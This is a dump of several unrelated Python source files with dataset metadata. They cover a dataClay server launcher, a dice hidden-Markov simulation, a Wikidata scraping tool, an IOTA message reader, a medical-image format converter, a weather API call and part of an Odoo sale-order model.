\"\"\"\n\n\"\"\"Entry point for standalone dataClay Execution Environment server.\n\nThe main can be called easily through a\n\n python -m dclay_server\n\"\"\"\n\nimport logging\n\n__author__ = 'Alex Barcelo '\n__copyright__ = '2015 Barcelona Supercomputing Center (BSC-CNS)'\n\nlogger = logging.getLogger(__name__)\n\n\n# We create a specific function that can be also run from importing the module (testing)\ndef run_main():\n # Current execution environment since they are initialized using environment variables and cannot be concurrently started in same host.\n from dataclay import initialize\n initialize()\n from dataclay.executionenv.server.ExecutionEnvironmentSrv import ExecutionEnvironmentSrv\n exec_env_srv = ExecutionEnvironmentSrv()\n exec_env_srv.start()\n\n \nif __name__ == \"__main__\":\n run_main()\n \n","sub_path":"src/dataclay/executionenv/server/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198851284","text":"from matplotlib import cm\nfrom matplotlib import pyplot as plt\nfrom itertools import cycle, islice\nimport pandas as pd\nimport math\nimport numpy as np\ncolor = cm.inferno_r(np.linspace(.4,.8, 30))\n# np.random.seed(100)\n\n# def createTables(K):\n# tables = np.array([list(range(1,K+1)),list(range(K+1,2*K+1))])\n# return tables\n#\ndef transitionMatrix(K):\n A = np.zeros((2,2))\n A[0,0] += 0.25\n A[0,1] += 0.75\n A[1,0] += 0.75\n A[1,1] += 0.25\n\n\n return A\n\ndef emissionMatrix(K):\n# fair_emissions = np.ones((K,6)) * 1/6\n# bias_emissions = np.zeros((K,6))\n# bias_emissions[:,4] = 0.3\n# bias_emissions[:,5] = 0.7\n# fullEm = np.concatenate([fair_emissions, bias_emissions], axis=0)\n emissions = np.zeros((2,6))\n emissions[0,:] = 1/6 # fair dice state\n emissions[1,:][4:6] = 0.5 # bias dice state\n# return fair_emissions , bias_emissions, fullEm\n# print(emissions)\n return emissions\n\ndef createObservationSeq(table_seq,K, P):\n fair = 0\n bias = 1\n outcomes = []\n for i in range(K):\n hidden = np.random.choice([True, False], p=[1-P, P])\n state = ''\n if not hidden:\n if table_seq[i] == fair:\n die = np.random.multinomial(1, [1/6.]*6)\n state = 'fair'\n elif table_seq[i] == bias:\n# die = np.random.multinomial(1, [0.5] + [0.5] + [0]*4)# .\n die = np.random.multinomial(1, [0.4] + [0.2] + [0.2] + [0.1] + [0.05]+[0.05])\n state='bias'\n die = np.where(die>0)[0][0] + 1 # select the outcome of a dice throw.\n outcomes.append((die,state)) # append to list of outcomes for a player\n else:\n # ZERO INDICATES A HIDDEN OUTCOME, since a die cannot have outcome = 0\n if table_seq[i] == fair:\n die = np.random.multinomial(1, [1/6.]*6)\n state = 'fair_hidden'\n elif table_seq[i] == bias:\n# die = np.random.multinomial(1, [0.5] + [0.5] + [0]*4)# .\n die = np.random.multinomial(1, [0.4] + [0.2] + [0.2] + [0.1] + [0.05]+ [0.05])\n state='bias_hidden'\n die = np.where(die>0)[0][0] + 1 # select the outcome of a dice throw.\n outcomes.append((die,state)) # append to list of outcomes for a player\n\n df = pd.DataFrame(outcomes)\n df.columns = ['outcome', 'die']\n return df\n\ndef simulateTableSeq(K):\n start_prob = 0.5\n table_seq = []\n t = np.random.choice(2,1, p=[start_prob , 1 - start_prob])[0] # chosing first table is random\n table_seq.append(t)\n for i in range(K-1):\n if t == 0:\n # then more proble to shift table group after each throw.\n t = np.random.choice(2,1, p=[0.25, 0.75])[0]\n elif t ==1:\n t = np.random.choice(2,1, p=[0.75, 
0.25])[0]\n table_seq.append(t)\n return table_seq\n\ndef simulateDice(K,players,P, distr):\n player_observations = []\n df = pd.DataFrame([])\n for i in range(players):\n if distr == 'mix':\n table_seq_vec = simulateTableSeq(K) # mixed , fiar and biased\n elif distr == 'bias':\n table_seq_vec = [1]*K # all biased\n elif distr == 'fair':\n table_seq_vec = [0]*K # all fair\n df_outcomes = createObservationSeq(table_seq_vec,K, P)\n df_outcomes['player'] = [i+1]*len(df_outcomes)\n df = pd.concat([df, df_outcomes])\n# print(df)\n return df\n\ndef plotObs(df_obs,players, distr):\n\n my_colors = [(0.2,0.4,0.5), (0.75, 0.25, 0.55)]*2\n# distr = 'mix'\n fig, ax = plt.subplots()\n if distr == 'mix' or distr == 'bias':\n b = df_obs[df_obs['die']=='bias'].groupby('outcome')['die'].count()\n b.plot.bar( stacked=True, color=my_colors ,title=\n 'Distribution of outcomes, ('+ distr + ')', rot=0, ax = ax)\n ax.set_ylabel('Counts for each outcome on a dice (all players inlcuded)')\n patches, labels = ax.get_legend_handles_labels()\n ax.legend(patches, labels, loc='best')\n\n if distr == 'mix' or distr == 'fair':\n f = df_obs[df_obs['die']=='fair'].groupby('outcome')['die'].count()\n f.plot.bar( stacked=True, color=my_colors[::-1], title=\n 'Distribution of outcomes',rot=0, ax = ax)\n ax.set_ylabel('Counts for each outcome on a dice (all players included)')\n patches, labels = ax.get_legend_handles_labels()\n ax.legend(patches, ['bias','fair'], loc='best')\n plt.show()\n\ndef plotPlayerSum(obs,distr):\n o = obs.groupby('player')['outcome','die'].sum()\n# o = o.sort_values(by=['outcome'])\n fig, ax = plt.subplots()\n o= o.reset_index()\n# print(o)\n my_colors = [(x/10.0, x/20.0, 0.75) for x in range(len(o))] # <-- Quick\n o['outcome'].plot(kind='bar',stacked = True, color=my_colors,title=\n 'Total sum for each player, ' + distr + ' dice distribution', rot = 0)\n ax.set_ylabel('Sum')\n ax.set_xlabel('Player')\n plt.show()\n\ndef multiPlot(obs_f,obs_b): # plot distributions, all fair and all bias\n fig, ax = plt.subplots()\n obs = pd.concat([obs_f,obs_b])\n o = obs.groupby(['player','die'])['outcome'].sum()\n my_colors = 'mb'\n o.plot.bar( stacked = True, color=my_colors,title= \n 'Sum for each player when using different dice distributons', rot = 0, ax=ax)\n ax.set_ylabel(\"Sum\")\n# print(o)\n plt.show()\n\ndef plotter(obs, players):\n color = 'rbg'\n fig, axes = plt.subplots(1,players, figsize=(12,3))\n for p in range(1,players+1):\n o = obs[obs['player']==p]\n ax = o['outcome'].plot.bar( stacked = True, color = color[p-1], ax = axes[p-1])\n ax.set_ylabel(\"dice outcome\")\n ax.set_xlabel(\"table i for player n\")\n patches, labels = ax.get_legend_handles_labels()\n ax.legend(patches, labels, loc='best')\n# o['outcome'].hist( color = color[p-1], ax = axes[p-1])\n plt.show()\n\ndef plotSums(d):\n ax = d.plot(kind='bar')\n ax.set_xlabel('player')\n ax.set_ylabel('sum')\n plt.show()\n\n\ndef main():\n K=2000\n N=3\n P = 0.8\n players = N\n pi_vec = np.array([0.5, 0.5])\n plot_without_hidden_outcomes = True\n# fair_emissions , bias_emissions, fullEm = emissionMatrix(K)\n# em_mat = emissionMatrix(K)\n# A_mat = transitionMatrix(K)\n# a = np.dot(pi_vec , em_mat\n\n \n distr = ['mix','fair','bias']\n obs = simulateDice(K,players,P,distr[2])\n obs = obs.assign(player_sequence = lambda x: x.outcome)\n print(obs)\n # NOW WE ARE ALLOWED TO SE THE TOTAL SUM: BUT ONLY THE OBSERVED OUTCOMES. 
NOT THE HIDDEN OUTCOMES.\n    if plot_without_hidden_outcomes == True:\n        obs.loc[obs['die'] == 'fair_hidden', 'outcome'] = 0 # 0 represents a hidden outcome\n        obs.loc[obs['die'] == 'bias_hidden', 'outcome'] = 0 # 0 represents a hidden outcome\n    \n    d = pd.DataFrame()\n#    d['player'] = [i for i in range(1,N+1)]\n\n    total_sums = []\n    observed_sums = []\n    sums = obs.groupby('player')['outcome'].sum()\n    print('observed sums for each player')\n    print(sums, '\\n')\n    for player in range(1,N+1):\n        p = obs[obs['player'] == player]\n        print('player: ', player)\n        print('Observed Sum: ', p.outcome.sum())\n        print('Original Sum: ', p.player_sequence.sum())\n        print('number of hidden: ', p[p['outcome']==0].count().outcome)\n        print(p, '\\n')\n        observed_sums.append(p.outcome.sum())\n        total_sums.append(p.player_sequence.sum())\n    d['observed_sum'] = observed_sums\n    d['original_sum'] = total_sums\n    print(d)\n    \n\n############## PLOT ########################################3\n    plotSums(d)\n    plotObs(obs,players,distr[2])\n    plotPlayerSum(obs, distr[2])\n    plotter(obs,players)\n#    # \n    \n    Sum = 4\n    dices = 3\n    P = [[0]*dices for _ in range(Sum)] # build independent rows; [[0]*dices]*Sum would alias one row Sum times\n    print(P)\n#    for i in range()\n\n############## PLOT SEVERAL DIFFERENT DICE DISTRIBUTIONS #########################\n\n#    obs_b = simulateDice(K,players,P,distr[2])\n#    obs_f = simulateDice(K,players,P,distr[1])\n#    plotObs(obs_b,players,distr[2])\n#    plotObs(obs_f,players,distr[1])\n    \n#    multiPlot(obs_f, obs_b) # obs_f/obs_b exist only when the block above is uncommented\n\n################ DYNAMIC PROGRAMMING ###############\nmain()\n","sub_path":"new_sum_HMM.py","file_name":"new_sum_HMM.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"218529721","text":"#!/usr/bin/python3\nf=open(\"shape_stat.csv\",\"r\")\ncount=0\nword=\"alarm clock\"\nfor i in f.readlines():\n\tk=i.split(\",\")\n\t\n\tif k[0]…\ndef _logging_print(input_string: str) -> None:\n    with open(LOGGING_FILE, 'a') as f:\n        f.write(input_string+'\\n')\n    print(input_string)\n    return None\n\n#@profile\ndef _print_all_gnome_shell_processes() -> None:\n    ps_e_process = subprocess.Popen(\"top -b -n 1\", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n    ps_e_stdout_string, _ = ps_e_process.communicate()\n    stdout_lines = ps_e_stdout_string.decode(\"utf-8\").split('\\n')\n    _logging_print(\"number of chrome processes {}\".format(len(list(filter(lambda line: 'chrome' in line, stdout_lines)))))\n    _logging_print(stdout_lines[0])\n    list(map(_logging_print, filter(lambda line: 'gnome-shell' in line, ps_e_stdout_string.decode(\"utf-8\").split('\\n'))))\n    return None\n\n######################\n# Async IO Utilities #\n######################\n\nUNIQUE_BOGUS_RESULT_IDENTIFIER = (lambda x: x)\n\nEVENT_LOOP = asyncio.new_event_loop()\nasyncio.set_event_loop(EVENT_LOOP)\n\n#@profile\ndef _indefinitely_attempt_task_until_success(coroutine, coroutine_args):\n    result = UNIQUE_BOGUS_RESULT_IDENTIFIER\n    while result == UNIQUE_BOGUS_RESULT_IDENTIFIER:\n        task = coroutine(*coroutine_args)\n        from datetime import datetime; _logging_print(\"_indefinitely_attempt_task_until_success attempt start time {}\".format(datetime.now()))\n        _logging_print(\"All shell processes 1\")\n        _print_all_gnome_shell_processes()\n        try:\n            results = EVENT_LOOP.run_until_complete(asyncio.gather(task))\n            if isinstance(results, list) and len(results) == 1:\n                result = results[0]\n        except Exception as err:\n            _logging_print(\"err :: {}\".format(err))\n            pass\n        finally:\n            _logging_print(\"All shell processes 2\")\n            _print_all_gnome_shell_processes()\n            pending_tasks = 
asyncio.Task.all_tasks()\n _logging_print(\"len(pending_tasks) {}\".format(len(pending_tasks)))\n for pending_task in pending_tasks:\n _logging_print(\"pending_task {}\".format(pending_task))\n _logging_print(\"All shell processes 3\")\n _print_all_gnome_shell_processes()\n if result == UNIQUE_BOGUS_RESULT_IDENTIFIER:\n warnings.warn(\"Attempting to execute {coroutine} on {coroutine_args} failed.\".format(coroutine=coroutine, coroutine_args=coroutine_args))\n time.sleep(1)\n return result\n\n##########################\n# Web Scraping Utilities #\n##########################\n\nasync def _launch_browser_page():\n browser = await pyppeteer.launch({'headless': False})\n page = await browser.newPage()\n return page\n\nBROWSER_PAGE = _indefinitely_attempt_task_until_success(_launch_browser_page, [])\n\n#############################\n# Wikidata Search Utilities #\n#############################\n\nWIKIDATA_SEARCH_URI_TEMPLATE = 'https://www.wikidata.org/w/index.php?sort=relevance&search={encoded_string}'\n\n#@profile\ndef _normalize_string_wrt_unicode(input_string: str) -> str:\n normalized_string = unicodedata.normalize('NFKD', input_string).encode('ascii', 'ignore').decode('utf-8')\n return normalized_string\n\nPUNUCTION_REMOVING_TRANSLATION_TABLE = str.maketrans('', '', string.punctuation)\n\n#@profile\ndef _normalize_string_for_wikidata_entity_label_comparison(input_string: str) -> str:\n normalized_string = input_string\n normalized_string = _normalize_string_wrt_unicode(normalized_string)\n normalized_string = normalized_string.lower()\n normalized_string = normalized_string.translate(PUNUCTION_REMOVING_TRANSLATION_TABLE)\n return normalized_string\n\n#@profile\nasync def _most_relevant_wikidata_entities_corresponding_to_string(input_string: str) -> str:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 1\")\n _print_all_gnome_shell_processes()\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 1\")\n wikidata_entities_corresponding_to_string = []\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 1.1\")\n page = BROWSER_PAGE\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 2\")\n input_string_encoded = urllib.parse.quote(input_string)\n uri = WIKIDATA_SEARCH_URI_TEMPLATE.format(encoded_string=input_string_encoded)\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 2\")\n _print_all_gnome_shell_processes()\n try:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 3\")\n _logging_print(\"uri {}\".format(uri))\n try:\n await page.goto(uri)\n except Exception as err:\n _logging_print(\"page.goto(uri) err {}\".format(err))\n exit()\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 3.5\")\n await page.waitForSelector('div#mw-content-text')\n search_results_div = await page.waitForSelector('div.searchresults')\n _logging_print(\"search_results_div {}\".format(search_results_div))\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 4\")\n search_results_paragraph_elements = await search_results_div.querySelectorAll('p')\n _logging_print(\"len(search_results_paragraph_elements) {}\".format(len(search_results_paragraph_elements)))\n search_results_have_shown_up = None\n for paragraph_element in search_results_paragraph_elements:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 5\")\n paragraph_element_classname_string = await 
page.evaluate('(p) => p.className', paragraph_element)\n _logging_print(\"paragraph_element_classname_string {}\".format(paragraph_element_classname_string))\n paragraph_element_classnames = paragraph_element_classname_string.split(' ')\n _logging_print(\"paragraph_element_classnames {}\".format(paragraph_element_classnames))\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 6\")\n for paragraph_element_classname in paragraph_element_classnames:\n if paragraph_element_classname == 'mw-search-nonefound':\n search_results_have_shown_up = False\n elif paragraph_element_classname == 'mw-search-pager-bottom':\n search_results_have_shown_up = True\n if search_results_have_shown_up is not None:\n break\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 7\")\n if search_results_have_shown_up is not None:\n break\n _logging_print(\"search_results_have_shown_up {}\".format(search_results_have_shown_up))\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 8\")\n if search_results_have_shown_up:\n search_results_divs = await page.querySelectorAll('div.mw-search-result-heading')\n _logging_print(\"len(search_results_divs) {}\".format(len(search_results_divs)))\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 9\")\n for search_results_div in search_results_divs:\n search_results_div_text_content = await page.evaluate('(search_results_div) => search_results_div.textContent', search_results_div)\n _logging_print(\"search_results_div_text_content {}\".format(search_results_div_text_content))\n parsable_text_match = re.match(r'^.+\\(Q[0-9]+\\) +$', search_results_div_text_content)\n _logging_print(\"parsable_text_match {}\".format(parsable_text_match))\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 10\")\n if parsable_text_match:\n parsable_text = parsable_text_match.group()\n parsable_text = parsable_text.replace(')','')\n parsable_text_parts = parsable_text.split('(')\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 11\")\n if len(parsable_text_parts)==2:\n (label, term_id) = parsable_text_parts\n label = label.strip()\n term_id = term_id.strip()\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 12\")\n if _normalize_string_for_wikidata_entity_label_comparison(label) == _normalize_string_for_wikidata_entity_label_comparison(input_string):\n wikidata_entities_corresponding_to_string.append(term_id)\n if len(wikidata_entities_corresponding_to_string)>5:\n break\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 13\")\n except pyppeteer.errors.NetworkError:\n pass\n finally:\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 3\")\n _print_all_gnome_shell_processes()\n # await page.close()\n # await browser.close()\n # _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 4\")\n # _print_all_gnome_shell_processes()\n # _logging_print(\"before communicate browser.process {}\".format(browser.process))\n # _, errs = browser.process.communicate()\n # assert errs is None\n # _logging_print(\"after communicate browser.process {}\".format(browser.process))\n # _logging_print(\"errs {}\".format(errs))\n # process_is_still_running = browser.process.poll() is None\n # _logging_print(\"process_is_still_running {}\".format(process_is_still_running))\n # assert not process_is_still_running\n 
_logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 5\")\n _print_all_gnome_shell_processes()\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string 14\")\n _logging_print(\"_most_relevant_wikidata_entities_corresponding_to_string All shell processes 6\")\n _print_all_gnome_shell_processes()\n return wikidata_entities_corresponding_to_string\n\n#@profile\ndef _string_corresponding_commonly_known_entities(input_string: str) -> List[str]:\n _logging_print(\"\")\n _logging_print(\"_string_corresponding_commonly_known_entities\")\n _logging_print(\"input_string {}\".format(input_string))\n result = _indefinitely_attempt_task_until_success(_most_relevant_wikidata_entities_corresponding_to_string, [input_string])\n return result\n\n####################################\n# Wikidata Query Service Utilities #\n####################################\n\nTYPE_TO_ID_MAPPING = bidict.bidict({\n 'Organization': 'Q43229',\n 'Anthroponym': 'Q10856962',\n 'Work': 'Q386724',\n 'Natural Geographic Entity': 'Q27096220',\n})\n\nQUERY_TEMPLATE_FOR_ENTITY_COMMONLY_KNOWN_ISAS = '''\nSELECT ?VALID_GENLS ?TERM\nWHERE \n{{\n VALUES ?TERM {{ {space_separated_term_ids} }}.\n ?TERM wdt:P31 ?IMMEDIATE_GENLS.\n ?IMMEDIATE_GENLS \twdt:P279* ?VALID_GENLS.\n VALUES ?VALID_GENLS {{ '''+' '.join(map(lambda type_string: 'wd:'+type_string, TYPE_TO_ID_MAPPING.values()))+''' }}.\n MINUS {{\n ?TERM wdt:P31 wd:Q4167410 .\n }}\n}}\n'''\n\nWIKI_DATA_QUERY_SERVICE_URI = 'https://query.wikidata.org'\n\n#@profile\ndef _sparql_query_queried_variables(sparql_query:str) -> List[str]:\n queried_variables = []\n sparql_tokens = sparql_query.split()\n assert sparql_tokens[0].lower()=='select'\n for sparql_token in sparql_tokens[1:]:\n if sparql_token[0]=='?':\n queried_variables.append(sparql_token)\n else:\n break\n return queried_variables\n\n#@profile\nasync def _query_wikidata_via_web_scraper(sparql_query:str) -> List[dict]:\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 1\")\n _print_all_gnome_shell_processes()\n results = []\n sparql_query_encoded = urllib.parse.quote(sparql_query)\n uri = WIKI_DATA_QUERY_SERVICE_URI+'/#'+sparql_query_encoded\n page = BROWSER_PAGE\n sparql_query_queried_variables = _sparql_query_queried_variables(sparql_query)\n number_of_variables_queried = len(sparql_query_queried_variables)\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 2\")\n _print_all_gnome_shell_processes()\n try:\n await page.goto(uri)\n selector_query_for_arbitrary_text_inside_query_box = 'span.cm-variable-2'\n await page.waitForSelector(selector_query_for_arbitrary_text_inside_query_box)\n button = await page.querySelector('button#execute-button')\n await page.evaluate('(button) => button.click()', button)\n await page.waitForSelector('div.th-inner.sortable.both')\n column_header_divs = await page.querySelectorAll('div.th-inner.sortable.both')\n assert len(column_header_divs) == number_of_variables_queried\n variable_names = []\n for column_header_div in column_header_divs:\n variable_name = await page.evaluate('(column_header_div) => column_header_div.textContent', column_header_div)\n variable_names.append(variable_name)\n assert sparql_query_queried_variables == list(map(lambda variable_name: '?'+variable_name, variable_names))\n anchors = await page.querySelectorAll('a.item-link')\n result = dict()\n for anchor_index, anchor in enumerate(anchors):\n anchor_variable = variable_names[anchor_index%number_of_variables_queried]\n 
anchor_link = await page.evaluate('(anchor) => anchor.href', anchor)\n assert len(re.findall(r\"^http://www.wikidata.org/entity/\\w+$\", anchor_link))==1\n entity_id = anchor_link.replace('http://www.wikidata.org/entity/','')\n anchor_variable_with_question_mark_prefix = '?'+anchor_variable\n result[anchor_variable_with_question_mark_prefix] = entity_id\n if (1+anchor_index)%number_of_variables_queried==0:\n assert len(result) == number_of_variables_queried\n results.append(result)\n result = dict()\n except pyppeteer.errors.NetworkError:\n pass\n finally:\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 3\")\n _print_all_gnome_shell_processes()\n # await page.close()\n # await browser.close()\n # _logging_print(\"_query_wikidata_via_web_scraper All shell processes 4\")\n # _print_all_gnome_shell_processes()\n # _logging_print(\"before communicate browser.process {}\".format(browser.process))\n # _, errs = browser.process.communicate()\n # assert errs is None\n # _logging_print(\"after communicate browser.process {}\".format(browser.process))\n # _logging_print(\"errs {}\".format(errs))\n # process_is_still_running = browser.process.poll() is None\n # _logging_print(\"process_is_still_running {}\".format(process_is_still_running))\n # assert not process_is_still_running\n _logging_print(\"_query_wikidata_via_web_scraper All shell processes 5\")\n _print_all_gnome_shell_processes()\n return results\n\n###########################\n# Most Abstract Interface #\n###########################\n\n#@profile\ndef execute_sparql_query_via_wikidata(sparql_query:str) -> List[dict]:\n _logging_print(\"\")\n _logging_print(\"execute_sparql_query_via_wikidata\")\n _logging_print(\"sparql_query {}\".format(sparql_query))\n result = _indefinitely_attempt_task_until_success(_query_wikidata_via_web_scraper, [sparql_query])\n return result\n\n#@profile\ndef _find_commonly_known_isas(term_ids_without_item_prefix: List[str]) -> Set[Tuple[str, str]]:\n term_type_pairs = set()\n if len(term_ids_without_item_prefix) != 0:\n term_ids = map(lambda raw_term_id: 'wd:'+raw_term_id, term_ids_without_item_prefix)\n space_separated_term_ids = ' '.join(term_ids)\n sparql_query = QUERY_TEMPLATE_FOR_ENTITY_COMMONLY_KNOWN_ISAS.format(space_separated_term_ids=space_separated_term_ids)\n results = execute_sparql_query_via_wikidata(sparql_query)\n for result in results:\n term = result['?TERM']\n term_type = result['?VALID_GENLS']\n term_type_pair = (term, term_type)\n term_type_pairs.add(term_type_pair)\n return term_type_pairs\n\n#@profile\ndef string_corresponding_wikidata_term_type_pairs(input_string: str) -> Set[Tuple[str, str]]:\n _logging_print(\"string_corresponding_wikidata_term_type_pairs All shell processes 1\")\n _print_all_gnome_shell_processes()\n term_ids = _string_corresponding_commonly_known_entities(input_string)\n _logging_print(\"\")\n _logging_print(\"string_corresponding_wikidata_term_type_pairs\")\n _logging_print(\"input_string {}\".format(input_string))\n _logging_print(\"term_ids {}\".format(term_ids))\n term_type_pairs = _find_commonly_known_isas(term_ids)\n term_type_pairs = [(term, TYPE_TO_ID_MAPPING.inverse[type_id]) for term, type_id in term_type_pairs]\n _logging_print(\"string_corresponding_wikidata_term_type_pairs All shell processes 2\")\n _print_all_gnome_shell_processes()\n return term_type_pairs\n\n#@profile\ndef main():\n _logging_print(\"This module contains utilities for named entity recognition via Wikidata scraping.\")\n _logging_print(\"BROWSER 
{}\".format(BROWSER))\n for _ in range(10):\n answer = string_corresponding_wikidata_term_type_pairs(\"friar\")\n _logging_print(\"answer {}\".format(answer))\n _logging_print(\"success\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"named_entity_recognition_via_wikidata/named_entity_recognition_via_wikidata.py","file_name":"named_entity_recognition_via_wikidata.py","file_ext":"py","file_size_in_byte":18254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"647349776","text":"# In this Example we will see how to read encrypted Messages with asymmetric Key Encryption(rsa)\n\n#First connect to a Node\n# Required Parameters are node, seed\nnode = \"https://nodes.thetangle.org:443\"\nseed = \"YOUR9SEED9GOES9HERE\"\napi = emi.connect_to_node(node,seed)\n\n#now we need the root_address\nroot_address = 'WUGJMZ9DLMWMV9ZBIQCZZS9CUCCCBAMWKXEEEUQMUBXHRGBCSHFSXYABBBTYRMSPFXNFRLD9VSXQWFLSW'\n# Now to read the Message Stream we will use a while loop. When we reach the last Message the loop will end.\nwhile True:\n #First we have to finde the Message\n message = emi.find_message(root_address)\n \n json_file = json.loads(message)\n \n #lets print out the message and next_address\n msg = json_file[\"1\"]\n encrypted_key = json_file[\"2\"]\n print(\"message: \" + str(msg))\n print(\"encrypted key: \" + str(encrypted_key))\n \n decrypted_key = emi.decrypt_pke(encrypted_key,alice_privat_key)\n \n decrypted_message = emi.decrypt_ske(msg,decrypted_key)\n print(\"decrypted key: \" + str(decrypted_key))\n print(\"decrypted_message: \" + str(decrypted_message))\n \n json_message = json.loads(decrypted_message)\n next_address = json_message['next_address']\n signature = json_message['signature']\n message = json_message['message']\n verify = emi.verify_signature(bob_public_key, signature,message)\n print(\"hash algorithmus: \" + str(verify))\n \n # Last step is to place next_addres as root_address\n root_address = next_address\n","sub_path":"main/examples/read_emi_asymmetric.py","file_name":"read_emi_asymmetric.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569981281","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 20 16:22:45 2018\n\n@author: Alex Daniel\n\"\"\"\n\nimport nibabel as nib\nimport sys\nimport numpy as np\n\nfin = sys.argv[1]\nimg = nib.load(fin, strict_sort=True, permit_truncated = True)\nhdr = img.header\ntry:\n nib.save(img, fin[:-3]+'nii.gz')\nexcept:\n print('Unable to convert '+fin+' to nii.gz')\n \nbvals, bvecs = hdr.get_bvals_bvecs()\necho_spacing = (1000.0 * hdr.general_info['water_fat_shift'])/(434.215*(hdr.general_info['epi_factor']+1))\n\nnp.savetxt(fin[:-3]+'bvec',bvecs.T, fmt = '%.3f')\nnp.savetxt(fin[:-3]+'bval',np.expand_dims(bvals,1).T, fmt = '%.0f')\nf = open(fin[:-3]+'echo', 'w')\nf.write('%.6f'%echo_spacing)\nf.close()\n","sub_path":"par_to_nifti.py","file_name":"par_to_nifti.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"289848918","text":"# Install the Python Requests library:\n# `pip install requests`\n\nimport requests\nimport json\n\ndef send_request():\n # Request weather underground\n # GET http://api.wunderground.com/api/380538e19b591277/conditions/q/TH/Bangkok.json\n\n try:\n response = requests.get(\n 
url=\"http://api.wunderground.com/api/380538e19b591277/conditions/q/TH/Bangkok.json\",\n )\n if response.status_code == 200:\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n print('Response HTTP Response Body: {content}'.format(\n content=response.content))\n return response.content\n else:\n print('Response HTTP Status Code: {status_code}'.format(\n status_code=response.status_code))\n return None\n\n except requests.exceptions.RequestException:\n print('HTTP Request failed')\n return None\n\n\ndef main():\n print(\"Start Program\")\n result = send_request()\n output = json.loads(result)\n print(type(result))\n print(type(output))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"WeatherUG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605591480","text":"# -*- coding: utf-8 -*-\n\nimport base64\nfrom io import StringIO\nimport csv\nimport logging\nimport time\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom tempfile import NamedTemporaryFile\nfrom odoo import models, fields, api, _\nfrom odoo.osv import osv\n#from pdf417gen import encode, render_image\n_logger = logging.getLogger(__name__)\n\nclass sale_order(models.Model):\n _inherit = \"sale.order\"\n \n @api.depends('avc_import_transaction_log_ids.skip_line')\n @api.multi\n def _is_order_is_mismatch(self):\n for order in self:\n for transaction_line in order.avc_import_transaction_log_ids :\n if transaction_line.skip_line:\n order.is_mismatch_order = True\n\n is_amazon_edi_order = fields.Boolean('is Amazon Order')\n amazon_edi_order_id = fields.Char('Amazon Order ID')\n amazon_order_ack_uploaded = fields.Boolean('Amazon order Acknowledgement Uploaded')\n amazon_order_dispatch_advice_uploaded = fields.Boolean('Amazon order Dispatch Advice uploaded')\n avc_import_transaction_log_ids = fields.One2many('avc.transaction.log.line','sale_order_id', string = 'AVC Import Transaction Log',domain=[('operation_type','=','import'),('application','=','sale_order')])\n avc_export_transaction_log_ids = fields.One2many('avc.transaction.log.line','sale_order_id', string = 'AVC Export Transaction Log',domain=[('operation_type','=','export'),('application','=','sale_order_response')])\n vendor_id = fields.Many2one('amazon.vendor.instance', string = \"Vendor\")\n requested_for_routing = fields.Boolean(string = \"Requested for Routing\")\n received_routing_info = fields.Boolean(string = \"Received Routing Information\")\n bill_of_lading_number = fields.Char(string = \"Bill of Lading Number\")\n account_type = fields.Char(string = \"Account Type\")\n is_mismatch_order = fields.Boolean('Is Mismatch Order',compute='_is_order_is_mismatch')\n mismatch_product = fields.Selection([('cancel', 'Cancel'), ('reject', 'Reject'), ('backorder', 'Backorder'), ],\n string='If Product not Found')\n \n # Messing Info details \n \n sender_id = fields.Char('Sender ID',readonly=True)\n recipient_id = fields.Char('Recipient ID',readonly=True)\n message_type = fields.Char('Type',readonly=True)\n msg_version = fields.Char('Version',readonly=True)\n buyer_id = fields.Char('Buyer ID',readonly=True)\n buyer_address = fields.Char('Buyer Address',readonly=True)\n supplier_id = fields.Char('Supplier ID',readonly=True)\n delivery_party_id = fields.Char('Delivery Party ID',readonly=True)\n country_code = fields.Char('Delivery Country',readonly=True)\n invoice_id = 
